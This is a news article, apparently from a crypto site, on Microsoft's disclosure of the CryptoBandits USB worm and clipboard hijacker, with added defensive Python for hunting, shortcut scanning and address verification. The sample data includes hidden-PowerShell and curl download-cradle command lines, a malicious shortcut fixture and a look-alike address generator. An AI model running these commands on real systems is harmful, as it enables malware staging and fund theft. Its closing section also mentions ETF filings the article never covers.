Microsoft Flags USB Worm That Quietly Swaps Your Crypto Address
June 19, 2026 3:28 pm
Microsoft Threat Intelligence said on June 17, 2026 that it found a Windows crypto clipper that has been hitting users since February 2026.
Microsoft Defender Antivirus flags it as Trojan:Win32/CryptoBandits.A.
This is not an exchange breach or a smart-contract exploit. It is old-school removable-media malware aimed squarely at how everyday people move coins.
The target list reads like a wallet user’s worst day: BIP39 seed phrases, Bitcoin private keys, and Ethereum private keys, covering the two assets sitting at the top of the market.
ALERT: @Microsoft identifies USB-spreading malware that hijacks crypto transfers by silently swapping copied wallet addresses with attacker-controlled ones before you paste. Disable AutoRun for USBs, block .lnk file execution, and always verify wallet addresses after pasting.
pic.twitter.com/OQOGH0FKDW
— CoinDesk (@CoinDesk) June 19, 2026
Microsoft documented the CryptoBandits malware chain and the practical defenses Windows crypto users should understand.
Microsoft Threat Intelligence said the Windows-based crypto clipper has affected users since February 2026 and is detected by Defender Antivirus as Trojan:Win32/CryptoBandits.A. The malware spreads through malicious shortcut files on USB drives, then uses Windows’ built-in automation components and ActiveX behavior to launch its components.
Once active, it polls the clipboard roughly every 500 milliseconds, fast enough to catch the routine action crypto users perform every day: copying a wallet address, a seed phrase, or a private key. Microsoft said the malware can steal BIP39 seed phrases and Bitcoin or Ethereum private keys, then route the stolen data through Tor-based hidden-service command-and-control infrastructure.
The clipper behavior is especially dangerous because it can replace copied recipient addresses with attacker-controlled addresses before the user pastes them into a wallet or payment flow. Microsoft also described screenshot exfiltration and remote-code execution capability, making the campaign broader than a single clipboard trick.
The recommended mitigations include disabling AutoRun and AutoPlay for removable media, blocking .lnk execution from removable drives, restricting built-in Windows automation tooling, using attack-surface-reduction rules, investigating suspicious curl or PowerShell chains, and hunting local Tor proxy activity on port 9050. The key distinction is that CryptoBandits targets endpoint behavior and wallet habits; it is not a flaw in Bitcoin or Ethereum themselves.
The malware also runs Tor through a local SOCKS5 proxy and polls hidden-service command-and-control. It can grab screenshots and run remote code through a lightweight backdoor.
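The hunting leads in that list, run over constructed telemetry, as an added example for this page rather than code from Microsoft's report or from Defender: Sysmon-style process-creation and network events are flagged when Explorer launches a shell or script host with arguments pointing at a removable drive letter, when curl is spawned by such a host (the download cradle in a curl or PowerShell chain), and when any process connects to the Tor SOCKS port on loopback. The drive letters, file paths, hostnames and sample events are assumptions built for the example.

```python
"""Hunting logic for the chain the article describes: a shortcut launched
from removable media, a shell or script host spawning curl or PowerShell,
and a process talking to a local Tor SOCKS proxy on 127.0.0.1:9050.
Event shapes and all sample events below are constructed for this example
(Sysmon-like field names); they are not indicators from Microsoft's report."""
import re

REMOVABLE_DRIVES = {"E:", "F:"}     # assumption: letters Windows assigned to USB media
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
TOR_SOCKS_PORT = 9050
PATH_RE = re.compile(r'\b([A-Za-z]:)\\[^\s"]*')


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def removable_paths(cmdline: str) -> list:
    """Every drive-letter path in a command line that sits on removable media."""
    return [m.group(0) for m in PATH_RE.finditer(cmdline)
            if m.group(1).upper() in REMOVABLE_DRIVES]


def hunt_process_events(events: list) -> list:
    """Return (pid, rule, detail) for process creations matching the chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image, parent = basename(e["image"]), basename(e["parent_image"])
        paths = removable_paths(e["command_line"])
        # Rule 1: Explorer (which resolves double-clicked .lnk files) starting a
        # shell or script host whose arguments point at the removable drive.
        if parent == "explorer.exe" and image in SHELLS and paths:
            findings.append((e["pid"], "shell launched from removable media", paths[0]))
        # Rule 2: curl spawned by a shell or script host, i.e. a download cradle;
        # walk parent_pid links to show the full ancestry.
        if image == "curl.exe" and parent in SHELLS:
            chain, p = [image], by_pid.get(e["parent_pid"])
            while p is not None:
                chain.append(basename(p["image"]))
                p = by_pid.get(p["parent_pid"])
            findings.append((e["pid"], "curl spawned by shell", " <- ".join(chain)))
    return findings


def hunt_network_events(events: list) -> list:
    """Flag any process connecting to the default Tor SOCKS port on loopback.
    Where Tor Browser is legitimately installed, exclude its tor.exe path."""
    return [(e["pid"], "connection to local Tor SOCKS port", basename(e["image"]))
            for e in events
            if e["dest_ip"] == "127.0.0.1" and e["dest_port"] == TOR_SOCKS_PORT]


EXPLORER = r"C:\Windows\explorer.exe"
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

PROCESS_EVENTS = [   # constructed sample telemetry
    {"pid": 100, "parent_pid": 1, "image": EXPLORER, "parent_image": r"C:\Windows\System32\userinit.exe",
     "command_line": "explorer.exe"},
    {"pid": 200, "parent_pid": 100, "image": CMD, "parent_image": EXPLORER,
     "command_line": r'cmd.exe /c powershell -w hidden -f "E:\.cache\stage.ps1"'},
    {"pid": 300, "parent_pid": 200, "image": PS, "parent_image": CMD,
     "command_line": r"powershell -w hidden -f E:\.cache\stage.ps1"},
    {"pid": 400, "parent_pid": 300, "image": r"C:\Windows\System32\curl.exe", "parent_image": PS,
     "command_line": r"curl.exe -s -o C:\Users\Public\svc.exe http://example.invalid/stage2"},
    {"pid": 500, "parent_pid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent_image": EXPLORER, "command_line": r'"WINWORD.EXE" /n "E:\report.docx"'},  # benign: Word opening a USB document
    {"pid": 600, "parent_pid": 100, "image": CMD, "parent_image": EXPLORER,
     "command_line": r"cmd.exe /c dir C:\Users"},                                       # benign: shell, no removable path
]

NETWORK_EVENTS = [   # constructed sample telemetry
    {"pid": 700, "image": r"C:\Users\Public\svc.exe", "dest_ip": "127.0.0.1", "dest_port": 9050},
    {"pid": 800, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "dest_ip": "203.0.113.10", "dest_port": 443},
]

if __name__ == "__main__":
    for f in hunt_process_events(PROCESS_EVENTS) + hunt_network_events(NETWORK_EVENTS):
        print(*f, sep=" | ")
```

On a live host the same rules sit on Sysmon event ID 1 (process create) and event ID 3 (network connect), and `Get-NetTCPConnection -LocalPort 9050` shows who is listening on or talking to the SOCKS port right now. The benign Word and `dir` events are there to show the rules need both the shell and the removable path, not either alone.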
CoinDesk translated Microsoft’s technical warning into a plain crypto-wallet risk story.
CoinDesk reported that the malware has spread through infected USB drives since February and targets Windows users’ crypto wallets. The article explained the malicious .lnk file path: a user clicks what appears to be an ordinary shortcut, and the worm installs wallet-stealing code on the machine.
Once installed, it watches the clipboard for seed phrases, private keys, and recipient addresses. If a user copies a crypto address before sending funds, the malware can silently swap in the attacker’s address so the pasted destination is different from the intended one.
CoinDesk also highlighted the propagation cycle that makes the USB angle important. When a clean USB drive is inserted into an infected computer, the worm can replace normal files such as documents, spreadsheets, and PDFs with identically named shortcut files, setting up the next infection.
That makes this a practical hygiene story for anyone moving files by removable media, more than a niche malware note for enterprise security teams. The useful reader takeaway is simple: verify pasted wallet addresses, treat unexpected USB shortcuts as dangerous, and take Microsoft’s endpoint mitigations seriously.
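A scan for that propagation pattern, as an added example that is not code from Microsoft, CoinDesk or BleepingComputer: it walks a directory (the root of a just-inserted drive, for instance) and flags .lnk files that carry a document extension in their name, sit next to a hidden file of the same name, or, by a minimal read of the shell-link StringData section, point at a shell or script host. The heuristics, the fixture tree and the shortcut contents are constructed for this example; on Windows the hidden-file check reads the file attribute, and elsewhere a leading-dot name stands in for it.

```python
"""Scan a directory, such as the root of a freshly inserted USB drive, for the
shortcut-swap pattern the article describes: .lnk files standing in for
documents. The heuristics, the minimal MS-SHLLINK string reader and the
fixture files are this example's own, not indicators from Microsoft's report."""
import os
import re
import stat
import tempfile
from pathlib import Path

DOC_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt", ".csv", ".jpg", ".png"}
SHELL_RE = re.compile(r"\b(cmd|powershell|pwsh|wscript|cscript|mshta|rundll32|curl)(\.exe)?\b", re.I)


def parse_lnk_strings(data: bytes) -> dict:
    """Read the StringData section of a shell link (.lnk): any of name,
    relative_path, working_dir, arguments, icon. {} if not a shell link header."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00":
        return {}
    flags = int.from_bytes(data[20:24], "little")
    pos = 76
    if flags & 0x01:                                   # HasLinkTargetIDList: 2-byte size, then the list
        pos += 2 + int.from_bytes(data[pos:pos + 2], "little")
    if flags & 0x02:                                   # HasLinkInfo: its first dword is the total size
        pos += int.from_bytes(data[pos:pos + 4], "little")
    width = 2 if flags & 0x80 else 1                   # IsUnicode -> UTF-16LE, else system code page
    out = {}
    for bit, key in ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                     (0x20, "arguments"), (0x40, "icon")):
        if flags & bit:
            count = int.from_bytes(data[pos:pos + 2], "little")
            raw = data[pos + 2:pos + 2 + count * width]
            pos += 2 + count * width
            out[key] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
    return out


def make_lnk(relative_path: str, arguments: str) -> bytes:
    """Minimal shell link for the fixture (flags: RelativePath, Arguments, Unicode)."""
    header = b"\x4c\x00\x00\x00" + bytes(16) + (0x08 | 0x20 | 0x80).to_bytes(4, "little") + bytes(52)
    def s(text):
        return len(text).to_bytes(2, "little") + text.encode("utf-16-le")
    return header + s(relative_path) + s(arguments)


def stem_key(name: str) -> str:
    return Path(name.lstrip(".")).stem.lower()         # ".notes.txt" and "notes.lnk" both -> "notes"


def is_hidden(path: Path) -> bool:
    attrs = getattr(path.stat(), "st_file_attributes", 0)                          # Windows hidden attribute
    return bool(attrs & stat.FILE_ATTRIBUTE_HIDDEN) or path.name.startswith(".")  # dotfile stand-in elsewhere


def scan_for_shortcut_swaps(root) -> list:
    """Return sorted (relative_path, [reasons]) for every suspicious .lnk under root."""
    root = Path(root)
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".lnk"):
                continue
            base = name[:-4]                                         # "report.pdf.lnk" -> "report.pdf"
            reasons = []
            if Path(base).suffix.lower() in DOC_EXTENSIONS:
                reasons.append(f"document name in front of .lnk ({Path(base).suffix})")
            twins = [t for t in files if t != name and stem_key(t) == stem_key(base)]
            hidden = [t for t in twins if is_hidden(Path(dirpath, t))]
            if hidden:
                reasons.append(f"hidden file with the same name alongside: {hidden[0]}")
            info = parse_lnk_strings(Path(dirpath, name).read_bytes())
            target = f"{info.get('relative_path', '')} {info.get('arguments', '')}".strip()
            if SHELL_RE.search(target):
                reasons.append(f"shortcut runs a shell or script host: {target}")
            if reasons:
                findings.append((Path(dirpath, name).relative_to(root).as_posix(), reasons))
    return sorted(findings)


def build_fixture() -> Path:
    """Constructed USB-like tree: swapped documents, a benign shortcut, a real photo."""
    root = Path(tempfile.mkdtemp(prefix="usb_"))
    evil = make_lnk(r"..\..\Windows\System32\cmd.exe",
                    r'/c start "" report.pdf & powershell -w hidden -f .cache\stage.ps1')
    (root / "report.pdf.lnk").write_bytes(evil)
    (root / "budget.xlsx.lnk").write_bytes(make_lnk(r"budget.xlsx", ""))  # only the double extension gives it away
    (root / "notes.lnk").write_bytes(evil)
    (root / ".notes.txt").write_bytes(b"meeting notes")                     # stands in for the hidden original
    (root / "Shortcut to Tools.lnk").write_bytes(make_lnk(r"Tools\readme.txt", ""))
    (root / "photo.jpg").write_bytes(b"\xff\xd8\xff")
    (root / "sub").mkdir()
    (root / "sub" / "invoice.docx.lnk").write_bytes(evil)
    return root


if __name__ == "__main__":
    for path, reasons in scan_for_shortcut_swaps(build_fixture()):
        print(path, "->", "; ".join(reasons))
```

The shell-link reader skips the ID list and LinkInfo structures and only pulls the relative path and arguments, which is where a shortcut that launches cmd.exe or PowerShell gives itself away; a full parser would also resolve the absolute target from LinkInfo. Windows hides the .lnk extension in Explorer regardless of folder settings, which is what makes the double-extension trick work on the user.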
Microsoft Warns of Tor-Based Crypto Clipper Targeting Wallet Data
Microsoft Threat Intelligence and Microsoft Defender Experts said they identified a Windows-based crypto clipper that has affected users since February 2026. The malware spreads via malicious .lnk shortcuts and… pic.twitter.com/tDZ6CNg322
— Wu Blockchain (@WuBlockchain) June 19, 2026
BleepingComputer reinforced the USB worm mechanics from a cybersecurity reporting angle.
BleepingComputer covered the same Microsoft-disclosed campaign and emphasized that the infection chain starts with Windows shortcut files on removable media. Its reporting is useful because it keeps the focus on how the worm spreads from machine to drive and then from drive to another machine.
The crypto payload includes clipper behavior, credential and wallet-data theft, Tor command-and-control, and screenshot exfiltration. That combination makes the campaign more persistent and harder to spot than a one-time fake wallet app.
For crypto users, the most important behavior is address substitution, because a transaction can be sent to the wrong destination even if the wallet software itself is functioning normally. The story also reinforces why endpoint controls matter in crypto security: a hardware wallet or exchange account does not protect every action if the computer used to prepare or verify a transaction is compromised.
BleepingComputer’s angle supports the practical framing without adding unsupported claims about blockchain-level compromise. The malware is attacking Windows systems and user routines, not breaking the cryptographic rules of Bitcoin, Ethereum, or other networks.
The weak point here is the human handoff between copying an address and confirming a transaction. CryptoBandits is built to live in that gap.
The plain takeaway for crypto users on Windows is simple. Treat unknown USB drives as hostile, and check the full receiving address after you paste, not just the first and last characters.
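The full-address check from that takeaway, as an added example that is not from the cited reporting: compare what was pasted with what was copied byte for byte, then decode it so a truncated or edited address fails its Base58Check or Bech32 checksum. The "legitimate" address is built from a fixed fake hash160 and the look-alike is brute-forced to share its first two and last two characters, standing in for the attacker-controlled address a clipper would swap in; both are constructed here, and the Bech32 test vector is the P2WPKH example from BIP173.

```python
"""Check a pasted recipient address against the one copied, the way the
article recommends: compare the whole string, then decode it so a truncated
or edited address fails its checksum. The Base58Check and Bech32 decoders
are written out here; the legitimate address and the attacker-style
look-alike are constructed in this example, not taken from any report."""
import hashlib
import random

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
BECH32 = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"


def sha256d(data: bytes) -> bytes:
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()


def b58check_encode(payload: bytes) -> str:
    data = payload + sha256d(payload)[:4]
    n, out = int.from_bytes(data, "big"), ""
    while n:
        n, r = divmod(n, 58)
        out = B58[r] + out
    return "1" * (len(data) - len(data.lstrip(b"\0"))) + out     # leading zero bytes encode as '1'


def b58check_decode(addr: str):
    """Return the payload (version byte + hash160) or None if a character or the checksum is bad."""
    n = 0
    for ch in addr:
        idx = B58.find(ch)
        if idx < 0:
            return None
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    data = b"\0" * (len(addr) - len(addr.lstrip("1"))) + body
    if len(data) < 5 or sha256d(data[:-4])[:4] != data[-4:]:
        return None
    return data[:-4]


def bech32_polymod(values) -> int:
    gen = (0x3B6A57B2, 0x26508E6D, 0x1EA119FA, 0x3D4233DD, 0x2A1462B3)
    chk = 1
    for v in values:
        top = chk >> 25
        chk = ((chk & 0x1FFFFFF) << 5) ^ v
        for i in range(5):
            if (top >> i) & 1:
                chk ^= gen[i]
    return chk


def bech32_valid(addr: str) -> bool:
    """Checksum check for bech32 (segwit v0) and bech32m (v1+) addresses; it does
    not enforce the version/constant pairing or the witness program length."""
    if addr != addr.lower() and addr != addr.upper():
        return False
    addr = addr.lower()
    pos = addr.rfind("1")
    if pos < 1 or pos + 7 > len(addr) or len(addr) > 90:
        return False
    hrp, data = addr[:pos], addr[pos + 1:]
    if any(c not in BECH32 for c in data):
        return False
    values = [ord(c) >> 5 for c in hrp] + [0] + [ord(c) & 31 for c in hrp] + [BECH32.find(c) for c in data]
    return bech32_polymod(values) in (1, 0x2BC830A3)


def looks_same_at_the_edges(copied: str, pasted: str, n: int = 2) -> bool:
    """The glance most people give an address: first and last few characters."""
    return copied[:n] == pasted[:n] and copied[-n:] == pasted[-n:]


def verify_paste(copied: str, pasted: str) -> bool:
    """True only if the pasted text is exactly what was copied and it decodes
    cleanly; a clipper swap or a mangled paste returns False."""
    return pasted == copied and (b58check_decode(pasted) is not None or bech32_valid(pasted))


def legit_address() -> str:
    """Constructed P2PKH address: version 0x00 plus a deterministic fake hash160."""
    return b58check_encode(b"\x00" + hashlib.sha256(b"constructed legit recipient").digest()[:20])


def lookalike_address(legit: str, seed: int = 2026) -> str:
    """Constructed stand-in for an attacker's swap address: a valid P2PKH address
    sharing the first two and last two characters with legit. Keeping the top
    hash byte makes the second character match most of the time, so only the
    two-character suffix is brute-forced (a few thousand tries)."""
    rng, top = random.Random(seed), b58check_decode(legit)[1:2]
    while True:
        cand = b58check_encode(b"\x00" + top + rng.getrandbits(152).to_bytes(19, "big"))
        if cand != legit and len(cand) == len(legit) and cand[:2] == legit[:2] and cand[-2:] == legit[-2:]:
            return cand


if __name__ == "__main__":
    legit, fake = legit_address(), lookalike_address(legit)
    print("copied :", legit)
    print("pasted :", fake)
    print("edges match:", looks_same_at_the_edges(legit, fake), "| full check:", verify_paste(legit, fake))
```

The look-alike passes the glance at the edges and is itself a perfectly valid address, which is why checksum validation alone cannot catch a swap; only comparing the entire string against the intended destination does. The checksum step still earns its place because it catches a paste that was cut short or edited, and the Bech32 part accepts both checksum constants without validating the witness program, which is enough for a sanity check but not a substitute for the wallet's own parser.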
CoinGecko provides the major-asset market context.
CoinGecko’s June 19 market data ranked Bitcoin first, Ethereum second, and Solana seventh by market capitalization in its live market-cap table. Bitcoin was near $63,006 in that snapshot, Ethereum was near $1,701, and Solana was near $68.95, giving the coverage a concrete price backdrop.
Those rankings show why ETF filings and wallet-security warnings involving these assets matter beyond narrow product paperwork or specialist trading desks. Bitcoin remains the anchor asset for ETF product design and wallet-security risk, while Ethereum and Solana remain large proof-of-stake networks with staking-specific product implications.
The ranking also separates these stories from lower-liquidity token chatter because the affected assets sit near the center of crypto market attention. Market rank is context only and does not act as a recommendation or a signal that any asset is insulated from volatility.
The ranking simply establishes that the affected assets are liquid, widely followed, and central to investor attention. It also shows that the filing and security angles land during a weak tape, with Bitcoin and Ethereum both trading well below prior-cycle highs.
That context is useful when a filing or malware warning sounds technical at first but has direct implications for the assets most crypto investors recognize.